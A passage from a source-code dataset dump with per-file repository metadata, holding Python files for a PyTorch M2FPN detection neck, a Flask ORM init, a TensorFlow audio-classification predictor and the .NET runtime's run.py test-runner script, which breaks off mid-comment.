self.input_planes = input_planes
self.planes = 2 * self.input_planes
self.first_level = first_level
self.scales = scales
self.in1 = input_planes + side_channel if not first_level else input_planes
self.layers = nn.Sequential()
self.layers.add_module('{}'.format(len(self.layers)), ConvModule(self.in1, self.planes, 3, 2, 1,conv_cfg=conv_cfg,norm_cfg=norm_cfg))
for i in range(self.scales - 2):
if not i == self.scales - 3:
self.layers.add_module(
'{}'.format(len(self.layers)),
ConvModule(self.planes, self.planes, 3, 2, 1,conv_cfg=conv_cfg,norm_cfg=norm_cfg)
)
else:
self.layers.add_module(
'{}'.format(len(self.layers)),
ConvModule(self.planes, self.planes, 3, 1, 0,conv_cfg=conv_cfg,norm_cfg=norm_cfg)
)
self.toplayer = nn.Sequential(ConvModule(self.planes, self.planes, 1, 1, 0,conv_cfg=conv_cfg,norm_cfg=norm_cfg))
self.latlayer = nn.Sequential()
for i in range(self.scales - 2):
self.latlayer.add_module(
'{}'.format(len(self.latlayer)),
ConvModule(self.planes, self.planes, 3, 1, 1,conv_cfg=conv_cfg,norm_cfg=norm_cfg)
)
self.latlayer.add_module('{}'.format(len(self.latlayer)), ConvModule(self.in1, self.planes, 3, 1, 1,conv_cfg=conv_cfg,norm_cfg=norm_cfg))
if self.is_smooth:
smooth = list()
for i in range(self.scales - 1):
smooth.append(
ConvModule(self.planes, self.planes, 1, 1, 0,conv_cfg=conv_cfg,norm_cfg=norm_cfg)
)
self.smooth = nn.Sequential(*smooth)
def _upsample_add(self, x, y, fuse_type='interp'):
_, _, H, W = y.size()
if fuse_type == 'interp':
return F.interpolate(x, size=(H, W), mode='nearest') + y
else:
raise NotImplementedError
def forward(self, x, y):
if not self.first_level:
x = torch.cat([x, y], 1)
conved_feat = [x]
for i in range(len(self.layers)):
x = self.layers[i](x)
conved_feat.append(x)
deconved_feat = [self.toplayer[0](conved_feat[-1])]
for i in range(len(self.latlayer)):
deconved_feat.append(
self._upsample_add(
deconved_feat[i], self.latlayer[i](conved_feat[len(self.layers) - 1 - i])
)
)
if self.is_smooth:
smoothed_feat = [deconved_feat[0]]
for i in range(len(self.smooth)):
smoothed_feat.append(
self.smooth[i](deconved_feat[i + 1])
)
return smoothed_feat
return deconved_feat
class SFAM(nn.Module):
def __init__(self, planes, num_levels, num_scales, compress_ratio=16):
super(SFAM, self).__init__()
self.planes = planes
self.num_levels = num_levels
self.num_scales = num_scales
self.compress_ratio = compress_ratio
self.fc1 = nn.ModuleList([nn.Conv2d(self.planes * self.num_levels,
self.planes * self.num_levels // 16,
1, 1, 0)] * self.num_scales)
self.relu = nn.ReLU(inplace=True)
self.fc2 = nn.ModuleList([nn.Conv2d(self.planes * self.num_levels // 16,
self.planes * self.num_levels,
1, 1, 0)] * self.num_scales)
self.sigmoid = nn.Sigmoid()
self.avgpool = nn.AdaptiveAvgPool2d(1)
def forward(self, x):
attention_feat = []
for i, _mf in enumerate(x):
_tmp_f = self.avgpool(_mf)
_tmp_f = self.fc1[i](_tmp_f)
_tmp_f = self.relu(_tmp_f)
_tmp_f = self.fc2[i](_tmp_f)
_tmp_f = self.sigmoid(_tmp_f)
attention_feat.append(_mf * _tmp_f)
return attention_feat
@NECKS.register_module
class M2FPN(nn.Module):
def __init__(self,
num_levels = 8,
num_scales = 5,
sfam=False,
smooth=True,
in_channels = [512,2048],
out_channels=256, conv_cfg=None,
norm_cfg=None):
super(M2FPN,self).__init__()
self.planes = out_channels
self.conv_cfg = conv_cfg
self.norm_cfg = norm_cfg
self.num_levels = num_levels
self.num_scales = num_scales
self.sfam = sfam
self.smooth = smooth
self.in_channels = in_channels
self.shallow_out =256
self.deep_out =512
self.construct_modules()
def construct_modules(self,):
for i in range(self.num_levels):
if i == 0:
setattr(self,
'unet{}'.format(i+1),
TUM(first_level=True,
input_planes=self.planes//2,
is_smooth=self.smooth,
scales=self.num_scales,
side_channel=512))
else:
setattr(self,
'unet{}'.format(i+1),
TUM(first_level=False,
input_planes=self.planes//2,
is_smooth=self.smooth,
scales=self.num_scales,
side_channel=self.planes))
self.reduce= ConvModule(self.in_channels[0], self.shallow_out, kernel_size=3, stride=1, padding=1)
self.up_reduce_1= ConvModule(self.in_channels[2], self.in_channels[1], kernel_size=1, stride=1)
self.up_reduce_2= ConvModule(self.in_channels[1], self.deep_out, kernel_size=1, stride=1)
self.Norm = nn.BatchNorm2d(256*8)
self.leach = nn.ModuleList([ConvModule(
self.deep_out+self.shallow_out,
self.planes//2,
kernel_size=(1,1),stride=(1,1))]*self.num_levels)
# construct localization and recognition layers
conv_out = nn.ModuleList()
for i in range(self.num_scales):
conv_out.append(nn.Conv2d(self.planes*self.num_levels,
self.planes,
3, 1, 1))
self.conv_out = nn.ModuleList(conv_out)
# construct SFAM module
if self.sfam:
self.sfam_module = SFAM(self.planes, self.num_levels, self.num_scales, compress_ratio=16)
def init_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
xavier_init(m, distribution='uniform')
def forward(self,x):
assert len(x)==len(self.in_channels)
# loc,conf = list(),list()
# base_feats = list()
# if 'vgg' in self.net_family:
# for k in range(len(self.base)):
# x = self.base[k](x)
# if k in self.base_out:
# base_feats.append(x)
# elif 'res' in self.net_family:
# base_feats = self.base(x, self.base_out)
up_feats = x[1] + F.interpolate(self.up_reduce_1(x[2]),scale_factor=2,mode='nearest')
base_feature = torch.cat(
(self.reduce(x[0]), F.interpolate(self.up_reduce_2(up_feats),scale_factor=2,mode='nearest')),1
)
# tum_outs is the multi-level multi-scale feature
tum_outs = [getattr(self, 'unet{}'.format(1))(self.leach[0](base_feature), 'none')]
for i in range(1,self.num_levels,1):
tum_outs.append(
getattr(self, 'unet{}'.format(i+1))(
self.leach[i](base_feature), tum_outs[i-1][-1]
)
)
# concat with same scales
sources = [torch.cat([_fx[i-1] for _fx in tum_outs],1) for i in range(self.num_scales, 0, -1)]
# forward_sfam
if self.sfam:
sources = self.sfam_module(sources)
sources[0] = self.Norm(sources[0])
output = []
for (x,cout) in zip(sources, self.conv_out):
output.append(cout(x))
return tuple(output)
| true | true |
f710330a49da0167ad8b2a80e0fe83ccfd86d6d1 | 41 | py | Python | src/infrastructure/db/models/__init__.py | oliveirahelena/flask-boilerplate | e614ad65f60d5ae04f94ba8e2f7c00d5821cf41f | [
"MIT"
] | null | null | null | src/infrastructure/db/models/__init__.py | oliveirahelena/flask-boilerplate | e614ad65f60d5ae04f94ba8e2f7c00d5821cf41f | [
"MIT"
] | null | null | null | src/infrastructure/db/models/__init__.py | oliveirahelena/flask-boilerplate | e614ad65f60d5ae04f94ba8e2f7c00d5821cf41f | [
"MIT"
] | null | null | null | from .orm import metadata, start_mappers
| 20.5 | 40 | 0.829268 | from .orm import metadata, start_mappers
| true | true |
f71033e02a6b94c708b484a5a8b6d3a055181306 | 881 | py | Python | test/apis/tensorflow/sound-classifier/predictor.py | wja30/cortex_0.31 | 522ec6226526dee6b4f8c3ed67bdf2b913d25de3 | [
"Apache-2.0"
] | 1 | 2020-09-09T04:04:30.000Z | 2020-09-09T04:04:30.000Z | test/apis/tensorflow/sound-classifier/predictor.py | wja30/cortex_0.31 | 522ec6226526dee6b4f8c3ed67bdf2b913d25de3 | [
"Apache-2.0"
] | null | null | null | test/apis/tensorflow/sound-classifier/predictor.py | wja30/cortex_0.31 | 522ec6226526dee6b4f8c3ed67bdf2b913d25de3 | [
"Apache-2.0"
] | null | null | null | from scipy.io.wavfile import read
import numpy as np
import io
import csv
class TensorFlowPredictor:
def __init__(self, tensorflow_client, config):
self.client = tensorflow_client
self.class_names = self.class_names_from_csv("class_names.csv")
def class_names_from_csv(self, csv_file):
class_names = []
with open(csv_file, "r", newline="") as f:
for row in csv.reader(f, delimiter=","):
class_names.append(row[2])
return class_names
def predict(self, payload):
rate, data = read(io.BytesIO(payload))
assert rate == 16000
result = self.client.predict({"waveform": np.array(data, dtype=np.float32)})
scores = np.array(result["output_0"]).reshape((-1, 521))
predicted_class = self.class_names[scores.mean(axis=0).argmax() + 1]
return predicted_class
| 31.464286 | 84 | 0.648127 | from scipy.io.wavfile import read
import numpy as np
import io
import csv
class TensorFlowPredictor:
def __init__(self, tensorflow_client, config):
self.client = tensorflow_client
self.class_names = self.class_names_from_csv("class_names.csv")
def class_names_from_csv(self, csv_file):
class_names = []
with open(csv_file, "r", newline="") as f:
for row in csv.reader(f, delimiter=","):
class_names.append(row[2])
return class_names
def predict(self, payload):
rate, data = read(io.BytesIO(payload))
assert rate == 16000
result = self.client.predict({"waveform": np.array(data, dtype=np.float32)})
scores = np.array(result["output_0"]).reshape((-1, 521))
predicted_class = self.class_names[scores.mean(axis=0).argmax() + 1]
return predicted_class
| true | true |
f710345e83902ad2ce3264936bfc7be3a0d99f86 | 62,597 | py | Python | src/tests/run.py | watfordgnf/runtime | 301056d6ff8f5ac0dea7fe07a8b450754ad846cb | [
"MIT"
] | 1 | 2020-12-02T16:42:26.000Z | 2020-12-02T16:42:26.000Z | src/tests/run.py | watfordgnf/runtime | 301056d6ff8f5ac0dea7fe07a8b450754ad846cb | [
"MIT"
] | 1 | 2020-12-02T09:16:02.000Z | 2020-12-02T09:16:02.000Z | src/tests/run.py | watfordgnf/runtime | 301056d6ff8f5ac0dea7fe07a8b450754ad846cb | [
"MIT"
] | null | null | null | #!/usr/bin/env python
#
## Licensed to the .NET Foundation under one or more agreements.
## The .NET Foundation licenses this file to you under the MIT license.
#
##
# Title: run.py
#
# Notes:
#
# Universal script to setup and run the xunit console runner. The script relies
# on run.proj and the bash and batch wrappers. All test excludes will also
# come from issues.targets. If there is a jit stress or gc stress exclude,
# please add GCStressIncompatible or JitOptimizationSensitive to the test's
# ilproj or csproj.
#
# The xunit runner currently relies on tests being built on the same host as the
# target platform. This requires all tests run on linux x64 to be built by the
# same platform and arch. If this is not done, the tests will run correctly;
# however, expect failures due to incorrect exclusions in the xunit
# wrappers setup at build time.
#
# Note that for linux targets the native components to the tests are still built
# by the product build. This requires all native components to be either copied
# into the Core_Root directory or the test's managed directory. The latter is
# prone to failure; however, copying into the Core_Root directory may create
# naming conflicts.
#
# If you are running tests on a different target than the host that built, the
# native tests components must be copied from:
# artifacts/obj/<OS>.<Arch>.<BuildType>/tests to the target. If the location is not
# standard please pass the -test_native_bin_location flag to the script.
#
# Use the instructions here:
# https://github.com/dotnet/runtime/blob/master/docs/workflow/testing/coreclr/windows-test-instructions.md
# https://github.com/dotnet/runtime/blob/master/docs/workflow/testing/coreclr/unix-test-instructions.md
#
################################################################################
################################################################################
import argparse
import datetime
import fnmatch
import json
import math
import os
import platform
import shutil
import subprocess
import sys
import tempfile
import time
import re
import string
import zipfile
import xml.etree.ElementTree
from collections import defaultdict
from sys import platform as _platform
# Version specific imports
if sys.version_info.major < 3:
import urllib
else:
import urllib.request
# Import coreclr_arguments.py from src\coreclr\scripts
sys.path.append(os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "coreclr", "scripts"))
from coreclr_arguments import *
################################################################################
# Argument Parser
################################################################################
# Long-form help text shown by `run.py -h`; mirrors the header comment at the
# top of this file.
description = ("""Universal script to setup and run the xunit console runner. The script relies
on run.proj and the bash and batch wrappers. All test excludes will also
come from issues.targets. If there is a jit stress or gc stress exclude,
please add GCStressIncompatible or JitOptimizationSensitive to the test's
ilproj or csproj.
The xunit runner currently relies on tests being built on the same host as the
target platform. This requires all tests run on linux x64 to be built by the
same platform and arch. If this is not done, the tests will run correctly;
however, expect failures due to incorrect exclusions in the xunit
wrappers setup at build time.
Note that for linux targets the native components to the tests are still built
by the product build. This requires all native components to be either copied
into the Core_Root directory or the test's managed directory. The latter is
prone to failure; however, copying into the Core_Root directory may create
naming conflicts.
If you are running tests on a different target than the host that built, the
native tests components must be copied from:
artifacts/obj/<OS>.<Arch>.<BuildType>/tests to the target. If the location is not
standard please pass the -test_native_bin_location flag to the script.""")

parser = argparse.ArgumentParser(description=description)

# Target triple and key directory locations. Most default to None; presumably
# they are resolved from the repo layout later in the script when not passed
# explicitly (the resolution code is outside this chunk — confirm in main()).
parser.add_argument("-os", dest="host_os", nargs='?', default=None)
parser.add_argument("-arch", dest="arch", nargs='?', default="x64")
parser.add_argument("-build_type", dest="build_type", nargs='?', default="Debug")
parser.add_argument("-test_location", dest="test_location", nargs="?", default=None)
parser.add_argument("-core_root", dest="core_root", nargs='?', default=None)
parser.add_argument("-product_location", dest="product_location", nargs='?', default=None)
# Default: four directories above this file (the repository root).
parser.add_argument("-runtime_repo_location", dest="runtime_repo_location", default=os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))))
parser.add_argument("-test_env", dest="test_env", default=None)
parser.add_argument("-crossgen_altjit", dest="crossgen_altjit", default=None)

# Optional arguments which change execution.

# Rid is used only for restoring packages. This is a unspecified and undocumented
# environment variable that needs to be passed to build.proj. Do not use this
# unless you are attempting to target package restoration for another host/arch/os
parser.add_argument("-rid", dest="rid", nargs="?", default=None)

# Boolean switches selecting which tests run and how they are executed.
parser.add_argument("--il_link", dest="il_link", action="store_true", default=False)
parser.add_argument("--long_gc", dest="long_gc", action="store_true", default=False)
parser.add_argument("--gcsimulator", dest="gcsimulator", action="store_true", default=False)
parser.add_argument("--ilasmroundtrip", dest="ilasmroundtrip", action="store_true", default=False)
parser.add_argument("--run_crossgen_tests", dest="run_crossgen_tests", action="store_true", default=False)
parser.add_argument("--run_crossgen2_tests", dest="run_crossgen2_tests", action="store_true", default=False)
parser.add_argument("--large_version_bubble", dest="large_version_bubble", action="store_true", default=False)
parser.add_argument("--precompile_core_root", dest="precompile_core_root", action="store_true", default=False)
parser.add_argument("--skip_test_run", dest="skip_test_run", action="store_true", default=False, help="Does not run tests. Useful in conjunction with --precompile_core_root")
parser.add_argument("--sequential", dest="sequential", action="store_true", default=False)
parser.add_argument("--analyze_results_only", dest="analyze_results_only", action="store_true", default=False)
parser.add_argument("--verbose", dest="verbose", action="store_true", default=False)
parser.add_argument("--limited_core_dumps", dest="limited_core_dumps", action="store_true", default=False)
parser.add_argument("--run_in_context", dest="run_in_context", action="store_true", default=False)

# Only used on Unix
parser.add_argument("-test_native_bin_location", dest="test_native_bin_location", nargs='?', default=None)
################################################################################
# Globals
################################################################################
# True when --verbose was passed; call_msbuild() adds /verbosity:diag when set.
g_verbose = False
# Set to True by get_environment()/create_and_use_test_env() when a
# COMPlus_GCStress variable is detected in the environment or test_env script.
gc_stress = False
# The system core-dump file name pattern, populated by
# setup_coredump_generation() on Linux/OSX; stays empty elsewhere.
coredump_pattern = ""
# Lazily-populated cache mapping keys to file names (missing keys -> None);
# consumers are outside this chunk — presumably used by result analysis code.
file_name_cache = defaultdict(lambda: None)
################################################################################
# Classes
################################################################################
class TempFile:
    """ Context manager yielding the *name* of a temporary file.

    The file is created with delete=False so external tools can open it by
    name while the scope is active; it is removed on scope exit.
    """
    def __init__(self, extension):
        """ Args:
                extension (str) : suffix for the temporary file (e.g. ".cmd")
        """
        self.file = None
        self.file_name = None
        self.extension = extension

    def __enter__(self):
        self.file = tempfile.NamedTemporaryFile(delete=False, suffix=self.extension)
        self.file_name = self.file.name
        return self.file_name

    def __exit__(self, exc_type, exc_val, exc_tb):
        try:
            # Close the handle before unlinking: on Windows removing a file
            # that is still open fails, and the open handle leaks a file
            # descriptor on every platform.
            self.file.close()
            os.remove(self.file_name)
        except:
            print("Error failed to delete: {}.".format(self.file_name))
class DebugEnv:
    """ Repro/debugging environment generator for a single failed test.

    Produces a platform-appropriate wrapper script (batch on Windows, bash
    elsewhere) that recreates the COMPlus environment the test failed under,
    and — when the test has a standalone .exe — a vscode launch.json entry
    so the failure can be debugged with the cpp extension.
    """
    def __init__(self,
                 args,
                 env,
                 test):
        """ Go through the failing tests and create repros for them

        Args:
            args            : script arguments (must provide host_os, arch,
                              build_type, artifacts_location, core_root, ...)
            env             : env for the repro (COMPlus key/value dict or None)
            test ({})       : The test metadata
        """
        self.unique_name = "%s_%s_%s_%s" % (test["name"],
                                            args.host_os,
                                            args.arch,
                                            args.build_type)

        self.args = args
        self.env = env
        self.test = test
        self.test_location = test["test_path"]

        self.__create_repro_wrapper__()

        self.path = None

        if self.args.host_os == "windows":
            self.path = self.unique_name + ".cmd"
        else:
            self.path = self.unique_name + ".sh"

        repro_location = os.path.join(self.args.artifacts_location, "repro", "%s.%s.%s" % (self.args.host_os, self.args.arch, self.args.build_type))
        assert os.path.isdir(repro_location)

        self.repro_location = repro_location
        self.path = os.path.join(repro_location, self.path)

        # Only tests with a standalone executable get a vscode debug config.
        exe_location = os.path.splitext(self.test_location)[0] + ".exe"
        if os.path.isfile(exe_location):
            self.exe_location = exe_location
            self.__add_configuration_to_launch_json__()

    def __add_configuration_to_launch_json__(self):
        """ Add to or create a launch.json with debug information for the test

        Notes:
            This will allow debugging using the cpp extension in vscode.
        """
        repro_location = self.repro_location
        assert os.path.isdir(repro_location)

        vscode_dir = os.path.join(repro_location, ".vscode")
        if not os.path.isdir(vscode_dir):
            os.mkdir(vscode_dir)

        assert os.path.isdir(vscode_dir)

        launch_json_location = os.path.join(vscode_dir, "launch.json")
        if not os.path.isfile(launch_json_location):
            # Seed an empty launch.json so the read below always succeeds.
            initial_json = {
                "version": "0.2.0",
                "configurations": []
            }

            json_str = json.dumps(initial_json,
                                  indent=4,
                                  separators=(',', ': '))

            with open(launch_json_location, 'w') as file_handle:
                file_handle.write(json_str)

        launch_json = None
        with open(launch_json_location) as file_handle:
            launch_json = file_handle.read()

        launch_json = json.loads(launch_json)

        configurations = launch_json["configurations"]

        # BUGFIX: previously read self.host_os, an attribute that is never set
        # on DebugEnv (the OS lives on self.args), raising AttributeError.
        dbg_type = "cppvsdbg" if self.args.host_os == "windows" else ""

        # Always assert-on-NYI inside the debugger so failures stop early.
        env = {
            "COMPlus_AssertOnNYI": "1",
            "COMPlus_ContinueOnAssert": "0"
        }

        if self.env is not None:
            # Convert self.env to a defaultdict and merge in the debug vars.
            self.env = defaultdict(lambda: None, self.env)
            for key, value in env.items():
                self.env[key] = value
        else:
            self.env = env

        # vscode expects environment entries as {"name": ..., "value": ...}.
        environment = []
        for key, value in self.env.items():
            env = {
                "name": key,
                "value": value
            }

            environment.append(env)

        configuration = defaultdict(lambda: None, {
            "name": self.unique_name,
            "type": dbg_type,
            "request": "launch",
            "program": self.args.corerun_path,
            "args": [self.exe_location],
            "stopAtEntry": False,
            "cwd": os.path.join("${workspaceFolder}", "..", ".."),
            "environment": environment,
            "externalConsole": True
        })

        if self.args.build_type.lower() != "release":
            symbol_path = os.path.join(self.args.core_root, "PDB")
            configuration["symbolSearchPath"] = symbol_path

        # Update configuration if it already exists.
        config_exists = False
        for index, config in enumerate(configurations):
            if config["name"] == self.unique_name:
                configurations[index] = configuration
                config_exists = True

        if not config_exists:
            configurations.append(configuration)

        json_str = json.dumps(launch_json,
                              indent=4,
                              separators=(',', ': '))

        with open(launch_json_location, 'w') as file_handle:
            file_handle.write(json_str)

    def __create_repro_wrapper__(self):
        """ Create the repro wrapper appropriate for the target OS.
        """
        if self.args.host_os == "windows":
            self.__create_batch_wrapper__()
        else:
            self.__create_bash_wrapper__()

    def __create_batch_wrapper__(self):
        """ Create a windows batch wrapper
        """
        wrapper = \
"""@echo off
REM ============================================================================
REM Repro environment for %s
REM
REM Notes:
REM
REM This wrapper is automatically generated by run.py. It includes the
REM necessary environment to reproduce a failure that occured during running
REM the tests.
REM
REM In order to change how this wrapper is generated, see
REM run.py:__create_batch_wrapper__(). Please note that it is possible
REM to recreate this file by running src/tests/run.py --analyze_results_only
REM with the appropriate environment set and the correct arch and build_type
REM passed.
REM
REM ============================================================================
REM Set Core_Root if it has not been already set.
if "%%CORE_ROOT%%"=="" set CORE_ROOT=%s
echo Core_Root is set to: "%%CORE_ROOT%%"
""" % (self.unique_name, self.args.core_root)

        line_sep = os.linesep

        if self.env is not None:
            for key, value in self.env.items():
                wrapper += "echo set %s=%s%s" % (key, value, line_sep)
                wrapper += "set %s=%s%s" % (key, value, line_sep)

        wrapper += "%s" % line_sep
        wrapper += "echo call %s%s" % (self.test_location, line_sep)
        wrapper += "call %s%s" % (self.test_location, line_sep)

        self.wrapper = wrapper

    def __create_bash_wrapper__(self):
        """ Create a unix bash wrapper
        """
        wrapper = \
"""
#============================================================================
# Repro environment for %s
#
# Notes:
#
# This wrapper is automatically generated by run.py. It includes the
# necessary environment to reproduce a failure that occured during running
# the tests.
#
# In order to change how this wrapper is generated, see
# run.py:__create_bash_wrapper__(). Please note that it is possible
# to recreate this file by running src/tests/run.py --analyze_results_only
# with the appropriate environment set and the correct arch and build_type
# passed.
#
# ============================================================================
# Set Core_Root if it has not been already set.
if [ \"${CORE_ROOT}\" = \"\" ] || [ ! -z \"${CORE_ROOT}\" ]; then
    export CORE_ROOT=%s
else
    echo \"CORE_ROOT set to ${CORE_ROOT}\"
fi
""" % (self.unique_name, self.args.core_root)
        # BUGFIX: previously formatted with self.core_root, an attribute that
        # is never set (the value lives on self.args), raising AttributeError
        # for every non-Windows repro.

        line_sep = os.linesep

        if self.env is not None:
            for key, value in self.env.items():
                wrapper += "echo export %s=%s%s" % (key, value, line_sep)
                wrapper += "export %s=%s%s" % (key, value, line_sep)

        wrapper += "%s" % line_sep
        wrapper += "echo bash %s%s" % (self.test_location, line_sep)
        wrapper += "bash %s%s" % (self.test_location, line_sep)

        self.wrapper = wrapper

    def write_repro(self):
        """ Write out the wrapper

        Notes:
            This will check if the wrapper repros or not. If it does not repro
            it will be put into an "unstable" folder under artifacts/repro.
            Else it will just be written out.
        """
        with open(self.path, 'w') as file_handle:
            file_handle.write(self.wrapper)
################################################################################
# Helper Functions
################################################################################
def create_and_use_test_env(_os, env, func):
    """ Create a test env based on the env passed

    Args:
        _os(str)                        : OS name
        env(defaultdict(lambda: None))  : COMPlus variables, key/value dict
        func(lambda)                    : lambda to call, after creating the
                                        : test_env

    Returns:
        Whatever func returns.

    Notes:
        Using the env passed, create a temporary file to use as the
        test_env to be passed for run.cmd. Note that this only happens
        on windows, until xunit is used on unix there is no managed code run
        in run.sh.

        When no COMPlus/SuperPMI variables are present, func is invoked with
        None instead of a test_env path.
    """
    global gc_stress

    ret_code = 0

    # Pick out only the stress-related variables from the environment passed.
    complus_vars = defaultdict(lambda: None)
    for key, value in env.items():
        if "complus" in key.lower() or "superpmi" in key.lower():
            complus_vars[key] = value

    if complus_vars:
        print("Found COMPlus variables in the current environment")
        print("")

        contents = ""

        # We can't use:
        #
        # with tempfile.NamedTemporaryFile() as test_env:
        #     ...
        #     return func(...)
        #
        # because on Windows Python locks the file, and trying to use it give you:
        #
        #    The process cannot access the file because it is being used by another process.
        #
        # errors.

        tempfile_suffix = ".bat" if _os == "windows" else ""
        test_env = tempfile.NamedTemporaryFile(mode="w", suffix=tempfile_suffix, delete=False)
        try:
            file_header = None

            if _os == "windows":
                file_header = \
"""@REM Temporary test env for test run.
@echo on
"""
            else:
                file_header = \
"""# Temporary test env for test run.
"""
            test_env.write(file_header)
            contents += file_header

            for key, value in complus_vars.items():
                command = "set" if _os == "windows" else "export"

                if key.lower() == "complus_gcstress":
                    # GC stress is driven through the test_env script only;
                    # clear it from the runner's own environment.
                    gc_stress = True
                    print("Unset %s" % key)
                    os.environ[key] = ""

                # \n below gets converted to \r\n on Windows because the file is opened in text (not binary) mode
                line = "%s %s=%s\n" % (command, key, value)
                test_env.write(line)
                contents += line

            if _os == "windows":
                file_suffix = \
"""@echo off
"""
                test_env.write(file_suffix)
                contents += file_suffix

            # Close before handing the path to func (see the Windows file
            # locking note above).
            test_env.close()

            print("")
            print("TestEnv: %s" % test_env.name)
            print("")
            print("Contents:")
            print("")
            print(contents)
            print("")

            ret_code = func(test_env.name)
        finally:
            os.remove(test_env.name)
    else:
        ret_code = func(None)

    return ret_code
def get_environment(test_env=None):
    """ Capture (and clear) every COMPlus_*/SuperPMI* environment variable.

    Args:
        test_env (str, optional) : path to a test_env script whose set/export
                                   lines are folded into the result.

    Returns:
        defaultdict : captured variables (missing keys yield ""). Entries
        parsed from test_env are stored under both the original key and its
        lower-cased form, so lookups can be done case-insensitively.

    Notes:
        All COMPlus variables need to be captured as a test_env script to avoid
        influencing the test runner. Captured variables are blanked out in
        os.environ as a side effect. Sets the global gc_stress flag when a
        GCStress variable is found.
        On Windows, os.environ keys (the environment variable names) are all
        upper case, and map lookup is case-insensitive on the key.
    """
    global gc_stress

    complus_vars = defaultdict(lambda: "")

    # Pull stress-related variables out of the live environment.
    for name in list(os.environ.keys()):
        lowered = name.lower()
        if "complus" in lowered or "superpmi" in lowered:
            complus_vars[name] = os.environ[name]
            os.environ[name] = ''

    # Fold in any variables defined by the test_env script.
    if test_env is not None:
        with open(test_env) as script:
            for line in script:
                parts = line.split("=")
                if len(parts) == 1:
                    # Not an assignment line (e.g. a header comment).
                    continue

                # "set FOO=bar" / "export FOO=bar": the name is the token
                # after the command word; only the first token of the second
                # "=" segment is kept as the value.
                name = parts[0].split(" ")[-1]
                value = parts[1].strip()
                try:
                    value = value.split(" ")[0]
                except:
                    pass

                complus_vars[name] = value
                # Support looking up case insensitive.
                complus_vars[name.lower()] = value

    if "complus_gcstress" in complus_vars:
        gc_stress = True

    return complus_vars
def call_msbuild(args):
    """ Invoke msbuild on run.proj to execute the built tests.

    Args:
        args : parsed script arguments; supplies the dotnet cli path, the
               test project location, log directories and run switches.

    Returns:
        int : exit code of the msbuild process.

    Notes:
        At this point the environment should be setup correctly, including
        the test_env, should it need to be passed.
    """
    global g_verbose

    # Make sure the log directory and the MSBuild debug-log directory exist
    # before msbuild starts writing into them.
    if not os.path.isdir(args.logs_dir):
        os.makedirs(args.logs_dir)

    msbuild_debug_logs_dir = os.path.join(args.logs_dir, "MsbuildDebugLogs")
    if not os.path.isdir(msbuild_debug_logs_dir):
        os.makedirs(msbuild_debug_logs_dir)
    os.environ["MSBUILDDEBUGPATH"] = msbuild_debug_logs_dir

    msbuild_command = [args.dotnetcli_script_path,
                       "msbuild",
                       os.path.join(args.coreclr_tests_src_dir, "run.proj"),
                       "/p:Runtests=true",
                       "/clp:showcommandline"]

    # Optional switches controlling how the tests are executed.
    if args.sequential:
        msbuild_command.append("/p:ParallelRun=none")
    if args.il_link:
        msbuild_command.append("/p:RunTestsViaIllink=true")
    if args.limited_core_dumps:
        msbuild_command.append("/p:LimitedCoreDumps=true")

    # File loggers: full log, warnings-only and errors-only views.
    log_path = os.path.join(args.logs_dir, "TestRunResults_%s_%s_%s" % (args.host_os, args.arch, args.build_type))
    msbuild_command.extend(["/fileloggerparameters:\"Verbosity=normal;LogFile=%s\"" % (log_path + ".log"),
                            "/fileloggerparameters1:\"WarningsOnly;LogFile=%s\"" % (log_path + ".wrn"),
                            "/fileloggerparameters2:\"ErrorsOnly;LogFile=%s\"" % (log_path + ".err"),
                            "/consoleloggerparameters:Summary"])

    if g_verbose:
        msbuild_command.append("/verbosity:diag")

    msbuild_command.extend(["/p:TargetOS=%s" % args.host_os,
                            "/p:TargetArchitecture=%s" % args.arch,
                            "/p:Configuration=%s" % args.build_type,
                            "/p:__LogsDir=%s" % args.logs_dir])
    msbuild_command.append("/bl:%s.binlog" % log_path)

    print(" ".join(msbuild_command))

    sys.stdout.flush() # flush output before creating sub-process
    proc = subprocess.Popen(msbuild_command)

    try:
        proc.communicate()
    except:
        # Do not leave the msbuild child running if waiting is interrupted.
        proc.kill()
        sys.exit(1)

    if args.limited_core_dumps:
        inspect_and_delete_coredump_files(args.host_os, args.arch, args.test_location)

    return proc.returncode
def setup_coredump_generation(host_os):
    """ Configures the environment so that the current process and any child
        processes can generate coredumps.

    Args:
        host_os (String)        : os

    Notes:
        This is only support for OSX and Linux, it does nothing on Windows.
        This will print a message if setting the rlimit fails but will otherwise
        continue execution, as some systems will already be configured correctly
        and it is not necessarily a failure to not collect coredumps.
    """
    global coredump_pattern

    def query_rlimit_core():
        """ Return the current 'ulimit -c' value as text. """
        # We specify 'shell=True' as the command may otherwise fail (some
        # systems will complain that the executable cannot be found in the
        # current directory).
        #
        # BUGFIX: decode the output; on Python 3 check_output returns bytes,
        # so the comparisons against the str "unlimited" below were always
        # unequal (b"unlimited" != "unlimited").
        limit = subprocess.check_output("ulimit -c", shell=True).rstrip()
        if isinstance(limit, bytes):
            limit = limit.decode('ascii')
        return limit

    if host_os == "OSX":
        coredump_pattern = subprocess.check_output("sysctl -n kern.corefile", shell=True).rstrip()
    elif host_os == "Linux":
        with open("/proc/sys/kernel/core_pattern", "r") as f:
            coredump_pattern = f.read().rstrip()
    else:
        print("CoreDump generation not enabled due to unsupported OS: %s" % host_os)
        return

    if isinstance(coredump_pattern, bytes):
        print("Binary data found. Decoding.")
        coredump_pattern = coredump_pattern.decode('ascii')
    print("CoreDump Pattern: {}".format(coredump_pattern))

    # resource is only available on Unix platforms
    import resource

    if coredump_pattern != "core" and coredump_pattern != "core.%P":
        print("CoreDump generation not enabled due to unsupported coredump pattern: %s" % coredump_pattern)
        return
    else:
        print("CoreDump pattern: %s" % coredump_pattern)

    rlimit_core = query_rlimit_core()

    if rlimit_core != "unlimited":
        try:
            # This can fail on certain platforms. ARM64 in particular gives: "ValueError: not allowed to raise maximum limit"
            resource.setrlimit(resource.RLIMIT_CORE, (resource.RLIM_INFINITY, resource.RLIM_INFINITY))
        except:
            print("Failed to enable CoreDump generation. rlimit_core: %s" % rlimit_core)
            return

        # Re-query to confirm the limit actually changed.
        rlimit_core = query_rlimit_core()
        if rlimit_core != "unlimited":
            print("Failed to enable CoreDump generation. rlimit_core: %s" % rlimit_core)
            return

    print("CoreDump generation enabled")

    if host_os == "Linux" and os.path.isfile("/proc/self/coredump_filter"):
        # Include memory in private and shared file-backed mappings in the dump.
        # This ensures that we can see disassembly from our shared libraries when
